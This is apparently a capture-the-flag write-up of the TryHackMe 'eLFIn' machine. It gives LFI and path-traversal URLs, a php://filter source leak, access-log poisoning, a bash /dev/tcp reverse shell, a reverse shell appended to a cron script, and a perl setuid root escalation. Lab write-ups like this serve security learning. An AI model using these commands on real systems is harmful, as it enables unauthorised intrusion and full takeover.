eLFIn-TryHackMe-Writeup

LFI machine

I am solving a machine on tryhackme this time called elFIn

let’s start with scanning as usual

Nmap scan

Only 2 ports were open ssh and the default web port

From the machine’s name it’s obvious that the machine is vulnerable to LFI (Local File Inclusion) some google search will be good to understand what LFI is if you don’t know it

Now let’s find a parameter in the web to abuse

list parameter

As we can see there is a parameter called list which allows us to go from page to another

I tried changing page1 to LFI payload and here is what i got :D

http://elfin.thm/index.php?list=/

Well looks like he knew we will be here

A rickroll would be much better but anyways let’s dive more since we are on the right way

After trying many payloads and all of them failed I tried this one and finally got something interesting

php://filter/convert.base64-encode/resource=page2/../index

It looks like a base64 encryption let’s decrypt it

page source

And here we are with the full page source

While checking the php code we can see that the server accepts a variable called “src” and add .php extension by adding one of the accepted parameters then the path to etc/passwd we should be able to read it let’s try

http://elfin.thm/index.php?list=page1/../../../../etc/passwd&src=

Nice I was able to read /etc/passwd successfully

/etc/passwd

For better look

Only 3 users can log in (root, www-data, bob)

After alot of searching for access.log it was very hard to find since it wasn’t in it’s default directory

So let’s try searching for 000-default.conf after a simple google search i found that it’s located in “/etc/apache2/sites-available/000-default.conf”

http://elfin.thm/index.php?list=page1/../../../../etc/apache2/sites-available/000-default.conf&src=

access.log location

We can see that access.log is in /etc/apache2/sites-available/site-2.conf

After changing the url to the location I found this

http://elfin.thm/index.php?list=page1/../../../../etc/apache2/sites-available/site-2.conf&src=

It’s written here that the access.log file was moved for security purposes

/var/log/eLFInlogs/access.log

Nice it was the right directory now it’s time to read it just change the url as I did before

http://elfin.thm/index.php?list=page1/../../../..//var/log/eLFInlogs/access.log&src=

It has all the requests we have done before with the user agent (browser version)

That means that maybe if we changed the user-agent with burp we could execute a php code let’s give it a try

See what we send in Request appears back in server’s Respond

I tried logs poisoning and tried many payloads and finally found the way to get in and it was with encoding the payload once in burp and it will works

shell request

After sending this request and in the other side running netcat as a listener we got a shell as user www-data

bash -c 'exec bash -i &>/dev/tcp/<ip>/<port> <&1'
nc -nvlp 1234

after some enumerating I found this hidden directory /var/www/.secret which has a file named priv.sh runs all the time and we can edit it…. could be useful if we can run it as root I checked the crontab and was it was scheduled to run priv.sh as user bob

cat /etc/crontab

/etc/crontab

I added a this rev shell in the priv.sh file to get a shell as user bob and ran a listener in other terminal

nc -nvlp <port>
echo "bash -c 'exec bash -i &>/dev/tcp/<IP>/<port> <&1'" >> /var/www/.secret/priv.sh

1st flag

Nice we got the first flag our mission now is to get root privileges

I looked for capabilities and found perl

getcap -r / 2>/dev/null

perl = cap_setuid+ep

Now by running this command we can get root easily

Note we should be in (/home/bob/.config) before executing the command

./.perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Bingo.. We are root now and can get the root.txt easily

root.txt

This machine was really fun and I learnt new tricks about LFI

SPECIAL THANKS:

n0n1mous > THM Account

MACHINE’s OWNER

1trick > THM Account